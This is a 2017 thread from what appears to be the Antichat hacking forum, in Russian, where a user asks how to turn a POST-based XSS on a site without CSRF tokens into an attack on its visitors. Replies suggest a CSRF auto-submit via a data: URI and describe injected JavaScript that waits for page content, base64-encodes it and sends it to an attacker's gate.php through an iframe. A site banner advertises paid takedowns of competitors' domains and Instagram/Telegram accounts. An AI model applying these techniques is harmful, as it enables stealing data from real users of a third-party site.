XSS в выводе информации с Ajax

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
XSS в выводе информации с Ajax

Опции темы

Поиск в этой теме

Опции просмотра

19.05.2017, 14:02

Elva

Новичок

Регистрация: 01.01.2016

Сообщений: 21

Провел на форуме:
5299

Репутация: 0

Имеется форма запроса по адресу - domen.com/info/

При нажатии на кнопку, идет POST запрос domen.com/ajax?action=getInfo

На domen.com/info/ выводится полученная информация из запроса, в той же странице.

При отправке JS в POST запросе, код успешно внедряется в domen.com/info/

Токенов нету.

Задача:Реализовать XSS атаку на пользователя находящегося на domen.com/info/

Проблема:Не разберусь как отправить POST запрос, чтобы он вывелся в рамках той же страницы.

Это возможно?

01.06.2017, 19:23

SooLFaa

Постоянный

Регистрация: 17.03.2014

Сообщений: 530

Провел на форуме:
187765

Репутация: 154

Код:

data:text/html, document.getElementById('a').click()

Это в браузер, т.е. задействуя csrf это можно сделать.

01.06.2017, 23:01

crlf

Постоянный

Регистрация: 18.03.2016

Сообщений: 663

Провел на форуме:
169212

Репутация: 441

Похоже на Self-XSS.

01.06.2017, 23:27

ol1ver

Участник форума

Регистрация: 22.07.2011

Сообщений: 229

Провел на форуме:
55143

Репутация: 0

Цитата:

Сообщение от None

При отправке JS в POST запросе, код успешно внедряется в domen.com/info/

попробуйте внедрить свой .js код на страницу domen.com/info

а в нем как вариант через setInterval(цикл) чекать вхождение DOM элемента (который появляется только при post запросе), появился - пакуем DOM тело страницы и шлем. Под понятием шлем - iframe src="gate.php?data=base64encode_dom_body"

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход